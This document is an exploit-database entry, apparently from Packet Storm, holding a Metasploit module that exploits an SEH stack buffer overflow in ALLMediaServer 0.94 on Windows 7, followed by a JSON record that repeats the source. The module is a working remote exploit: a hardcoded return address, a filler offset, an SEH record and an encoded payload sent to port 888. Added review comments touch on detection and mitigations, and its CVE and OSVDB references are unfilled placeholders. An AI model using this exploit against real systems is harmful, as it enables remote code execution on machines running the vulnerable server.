ID PACKETSTORM:121006 Type packetstorm Reporter metacom Modified 2013-03-29T00:00:00
Description
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit remote exploit module for a stack buffer overflow in
# ALLMediaServer 0.94 (per the 'Description' field below). It mixes in the
# framework's TCP client and SEH helpers and defines a single target.
#
# NOTE(review): several metadata fields below are still unfilled template
# placeholders (see 'References'), so do not treat them as authoritative
# identifiers when triaging this entry or writing detections from it.
class Metasploit3 < Msf::Exploit::Remote
#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
Rank = NormalRanking
# Framework mixins: raw TCP client helpers and SEH-record generation.
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
# Registers the module metadata (name, references, payload constraints,
# target definition) and the default remote port.
#
# @param info [Hash] metadata overrides, merged through update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability
is caused due to a boundary error within the handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom<metacom27[at]gmail.com>', # Original discovery
'<metacom>', # MSF Module
'RST',
],
# NOTE(review): the OSVDB and CVE entries are template placeholders that were
# never filled in, not real identifiers; only the URL entry carries a
# concrete value. Asset and vulnerability tracking cannot key on a CVE here.
'References' =>
[
[ 'OSVDB', '<insert OSVDB number here>' ],
[ 'CVE', 'insert CVE number here' ],
[ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
#'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
# Payload encoding constraints: NUL bytes are excluded and NOP generation
# is disabled.
'Payload' =>
{
'BadChars' => "\x00", # <change if needed>
'DisableNops' => true,
},
# Single target. 'Ret' is a hardcoded address the author attributes to
# avcodec-53.dll; 'Offset' is the filler length placed before the SEH record
# in #exploit.
# NOTE(review): a fixed address is only stable if that DLL loads at a
# constant base, so presumably it is not protected by ASLR/SafeSEH; confirm
# against the installed binary. ASLR, SafeSEH and SEHOP are the mitigations
# to check on affected hosts.
'Targets' =>
[
[ 'Windows 7',# Tested on: Windows 7 SP1/SP0
{
'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll
'Offset' => 1065
}
],
],
'Privileged' => false,
#Correct Date Format: "M D Y"
#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
'DisclosureDate' => 'Mar 28 2013',
'DefaultTarget' => 0))
# Default remote port is 888/tcp (presumably the media server's listening
# port; confirm against the deployment). Restricting network access to this
# port limits exposure of the service.
register_options([Opt::RPORT(888)], self.class)
end
# Connects to the target, sends one crafted buffer, then calls the payload
# handler and closes the connection.
#
# The buffer is assembled in a fixed order: the literal "http://",
# target['Offset'] bytes of random filler, an SEH record built from the
# target's 'Ret' value, and the encoded payload.
#
# NOTE(review, detection): this method writes a single blob that starts with
# "http://" and runs to more than 1065 bytes; it adds no HTTP method, headers
# or line terminator. An over-long, malformed request to the service port is
# therefore the thing to alert on. The filler is random, so byte signatures
# on that region will not match across attempts.
def exploit
connect
buffer = "http://"
buffer << rand_text(target['Offset']) #junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded #3931 bytes of space
# more junk may be needed to trigger the exception
print_status("Sending payload to ALLMediaServer on #{target.name}...")
sock.put(buffer)
handler
disconnect
end
end
`
{"id": "PACKETSTORM:121006", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ALLMediaServer 0.94 Buffer Overflow", "description": "", "published": "2013-03-29T00:00:00", "modified": "2013-03-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/121006/ALLMediaServer-0.94-Buffer-Overflow.html", "reporter": "metacom", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:28", "viewCount": 1, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2016-11-03T10:29:28", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:28", "rev": 2}, "vulnersScore": 1.2}, "sourceHref": "https://packetstormsecurity.com/files/download/121006/allmediaserver-0.94.rb.txt", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking \n#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability \nis caused due to a boundary error within the handling of HTTP request. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'metacom<metacom27[at]gmail.com>', # Original discovery \n'<metacom>', # MSF Module \n'RST', \n], \n'References' => \n[ \n[ 'OSVDB', '<insert OSVDB number here>' ], \n[ 'CVE', 'insert CVE number here' ], \n[ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ] \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'process', #none/process/thread/seh \n#'InitialAutoRunScript' => 'migrate -f', \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'BadChars' => \"\\x00\", # <change if needed> \n'DisableNops' => true, \n}, \n \n'Targets' => \n[ \n[ 'Windows 7',# Tested on: Windows 7 SP1/SP0 \n{ \n'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll \n'Offset' => 1065 \n} \n], \n], \n'Privileged' => false, \n#Correct Date Format: \"M D Y\" \n#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec \n'DisclosureDate' => 'Mar 28 2013', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(888)], self.class) \n \nend \n \ndef exploit \n \n \nconnect \nbuffer = \"http://\" \nbuffer << rand_text(target['Offset']) #junk \nbuffer << generate_seh_record(target.ret) \nbuffer << payload.encoded #3931 bytes of space \n# more junk may be needed to trigger the exception \n \nprint_status(\"Sending payload to ALLMediaServer on #{target.name}...\") \nsock.put(buffer) \n \nhandler \ndisconnect \n \nend \nend \n`\n"}